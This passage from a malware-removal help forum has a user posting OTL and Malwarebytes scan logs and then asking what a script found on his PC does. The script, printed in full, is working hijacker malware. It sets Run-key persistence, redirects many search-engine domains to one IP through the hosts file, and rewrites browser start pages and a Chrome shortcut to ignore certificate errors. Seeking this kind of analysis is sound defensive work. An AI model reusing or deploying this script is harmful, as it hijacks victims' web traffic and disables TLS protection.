O4 - HKU\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\Run: [F.lux] C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe (Flux Software LLC)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\RunOnce: [Adobe Speed Launcher] 1422035204 File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8:64bit: - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([asa1] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([cad] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([webvpn] https in Trusted sites)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O16 - DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 1.7.0_51)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F450D213-6B32-4A98-B391-92E436671A03}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell - "" = AutoRun
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell\AutoRun\command - "" = F:\Startme.exe
O33 - MountPoints2\F\Shell - "" = AutoRun
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\setup.exe
O33 - MountPoints2\G\Shell - "" = AutoRun
O33 - MountPoints2\G\Shell\AutoRun\command - "" = G:\bunnyust.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

Reply #10, January 23, 2015, 09:22:17 PM

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?
« Reply #10 on: January 23, 2015, 09:22:17 PM »
----------------************** Continuing from the other post ************-------------------




========== Files/Folders - Created Within 30 Days ==========
 
[2015/01/23 12:35:19 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/01/22 20:49:27 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/01/22 20:00:38 | 000,000,000 | ---D | C] -- C:\FRST
[2015/01/22 00:05:16 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.jmc
[2015/01/21 23:50:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2015/01/21 23:49:49 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Desktop\mbar
[2015/01/21 22:33:14 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2015/01/21 21:53:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Spybot - Search & Destroy
[2015/01/15 15:06:11 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Documents\FIFA 15
[2015/01/13 16:45:28 | 005,553,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2015/01/13 16:45:27 | 003,971,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2015/01/13 16:45:27 | 003,916,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2015/01/13 16:45:27 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2015/01/13 16:45:27 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe
[2015/01/13 16:45:27 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll
[2015/01/13 16:45:26 | 000,156,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ncsi.dll
[2015/01/13 16:45:26 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\TSWbPrxy.exe
[2014/12/26 22:56:58 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.gradle
[2014/12/26 00:22:00 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.AndroidStudio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.android
[2014/12/25 23:58:57 | 000,084,992 | ---- | C] (Intel  Corporation) -- C:\Windows\SysNative\drivers\IntelHaxm.sys
[2014/09/16 23:06:27 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe1289.dll
[2014/09/16 22:57:10 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe92DE.dll
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:52:03 | 000,880,194 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2015/01/23 12:52:03 | 000,731,498 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2015/01/23 12:52:03 | 000,148,396 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2015/01/23 12:46:07 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/01/23 08:13:31 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/01/23 00:22:00 | 000,000,932 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
[2015/01/22 21:11:30 | 000,097,496 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2015/01/22 20:55:37 | 000,701,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2015/01/22 20:55:37 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2015/01/22 19:22:00 | 000,000,880 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2015/01/22 11:23:36 | 000,037,624 | ---- | M] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/22 00:02:51 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2015/01/20 16:15:27 | 000,000,958 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2015/01/16 22:23:19 | 000,002,356 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Google Chrome.lnk
[2015/01/06 13:14:01 | 000,000,600 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2015/01/22 00:02:50 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2015/01/21 22:33:15 | 000,037,624 | ---- | C] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/20 16:15:27 | 000,000,958 | ---- | C] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2014/10/05 15:08:05 | 000,000,057 | ---- | C] () -- C:\Users\Tom Jones\.gitconfig
[2014/10/05 14:55:06 | 000,001,833 | ---- | C] () -- C:\Users\Tom Jones\.bash_history
[2014/07/01 00:29:30 | 000,000,396 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/05/29 16:14:15 | 000,008,192 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/12/20 23:51:16 | 000,000,212 | ---- | C] () -- C:\Windows\ildasmfnt.bin
[2013/07/20 00:48:09 | 002,580,552 | R--- | C] () -- C:\Windows\SysWow64\pbsvc.exe
[2013/07/01 18:05:35 | 000,000,001 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\llftool.4.30.agreement
[2013/04/16 22:52:23 | 000,000,322 | ---- | C] () -- C:\Users\Tom Jones\configuration_log.csv
[2012/10/07 15:51:26 | 000,000,600 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[2012/03/26 17:26:16 | 000,007,602 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\resmon.resmoncfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/11/20 23:45:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.emacs.d
[2014/08/26 23:14:19 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.mono
[2012/03/24 12:24:09 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Auslogics
[2014/01/26 02:06:42 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\BSplayer PRO
[2014/03/19 11:05:16 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\com.valve.FTP
[2014/05/03 16:31:45 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\FileZilla
[2014/01/21 20:36:22 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\iFunbox_UserCache
[2013/02/03 03:07:13 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Immunity Debugger
[2012/03/24 07:32:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Leadertech
[2014/03/08 00:15:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mael
[2013/10/26 00:03:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Milestone
[2015/01/20 23:10:21 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MiniLyrics
[2012/05/30 21:01:56 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MotioninJoy
[2014/09/07 17:40:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola
[2014/09/07 16:47:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola Mobility
[2013/04/28 22:49:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mumble
[2014/04/01 11:52:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MySQL
[2014/03/16 19:16:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NetBeans
[2014/08/27 18:25:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Notepad++
[2013/12/21 00:41:29 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NuGet
[2014/10/10 09:51:25 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\OfficeRecovery
[2014/02/22 12:56:28 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Oracle
[2013/07/21 18:41:06 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Origin
[2012/10/26 16:42:46 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\redsn0w
[2014/09/16 22:55:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sony
[2014/12/07 18:45:15 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SSH
[2014/08/26 23:14:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Steam
[2014/04/26 14:07:24 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sublime Text 3
[2012/11/20 15:05:01 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SystemRequirementsLab
[2014/04/27 22:14:02 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TeamViewer
[2013/02/05 04:31:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TightVNC
[2012/05/20 03:19:59 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Ubisoft
[2015/01/22 20:59:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\uTorrent
[2013/12/20 23:53:18 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\VisualAssist
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
 
< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

---------------------------------------------------------------------------------------------------------------------



3. New Malwarebytes scan produced:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/23/2015
Scan Time: 1:56:15 PM
Logfile:
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.01.23.06
Rootkit Database: v2015.01.14.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Tom Jones

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 821488
Time Elapsed: 1 hr, 2 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Reply #11 January 23, 2015, 10:34:50 PM

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?
« Reply #11 on: January 23, 2015, 10:34:50 PM »

 
========== Custom Scans ==========
 
< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
 
< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

Regarding this part of the scan, where you try to search any file that ends in .vbs or .bat, I don't think the file I was referring to will show up since it had NO extension. I had to manually change it to .txt in order to be able to attach it here.

Please take a look at it if you can, it's just a text file that I think would be called from somewhere else and then after execution as a .bat file some other program may have renamed it, i.e. remove the extension altogether.

-attached it.

Reply #12 January 24, 2015, 06:28:49 AM

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?
« Reply #12 on: January 24, 2015, 06:28:49 AM »
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.

Code:
@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
